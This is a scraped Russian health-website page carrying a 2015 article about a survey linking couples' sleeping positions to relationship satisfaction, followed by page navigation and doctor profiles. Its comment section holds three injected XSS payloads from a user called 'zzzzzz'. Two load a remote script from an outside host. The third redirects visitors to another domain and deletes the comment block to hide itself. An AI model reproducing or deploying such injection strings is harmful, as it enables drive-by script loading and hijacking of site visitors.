Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  То как вы спите, расскаже...  >>  То как вы спите, расскажет все о ваших отношениях
 
Обратная связь
 

То как вы спите, расскажет все о ваших отношениях

Размер шрифта
13 мая 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, поза, в которой вы спите ночью, может многое рассказать не только о вас, но и о ваших отношениях.

То как вы спите, расскажет все о ваших отношениях

Исследование, проведенное в Университете Хертфордшира, возглавил профессор психологии Ричард Вайзман. Его команда опросила более тысячи человек, каждого из которых попросили описать ту позу, в которой он обычно спит, а также рассказать о себе и о своих отношениях.

Результаты показали, что чаще всего, а именно в 42% случаев, партнеры спят спиной друг к другу. В 31% случаев они спят, повернувшись лицами в одном направлении, и только 4% пар спят лицом к лицу. К тому же, 12% пар спят на расстоянии менее 2,5 сантиметров друг от друга и лишь 2% пар – на расстоянии более 76 сантиметров.

«Прямой контакт оказался очень важен. 94% пар, которые во сне касались друг друга, были довольны своими отношениями. Из тех пар, что не касались друг друга во сне, лишь 68% были счастливы в отношениях», – рассказывает профессор Вайзман. Чем дальше друг от друга спали партнеры, тем хуже оказывались их взаимоотношения. 86% пар, которые спали менее чем в 3 сантиметрах друг от друга, были счастливы в отношениях, а среди тех, кто спал на расстоянии больше 76 сантиметров, счастливы были лишь 66%. Ученые также обнаружили, что экстраверты чаще всего спали очень близко к своим партнерам. «Наши результаты позволяют нам судить об отношениях в паре просто спросив у людей, как именно они предпочитают спать», – объясняет профессор Вайзман.

Разумеется, подобные исследования не стоит воспринимать слишком буквально, однако они очень интересны, ведь дают нам возможность понять, как много об отношениях могут сказать такие, казалось бы, мелочи, как любимые позы во время сна.

Другие статьи о женском здоровье читайте на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:10

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Синхронность сна скажет, насколько вы удовлетворены мужем!   Ждать принца на белом коне – ОШИБКА!   Сохрани романтику с помощью двойных свиданий   Как пережить расставание по науке  
15 июля 2013Сколько нужно спать, чтобы помнить все 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 
30 января 2013Хотите не чувствовать боли – спите дольше 04 января 2013Сбылась мечта студента: уснул, а утром уже все знаешь
 

Слайдшоу

1
Признаки развода, которые вы игнорируете
7 способов весело провести время, когда у вас простуда
Жаркий секс за 5 минут!

Тесты

1
Хорошо ли Вы спите?
Нормальный ли у вас сон?
Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.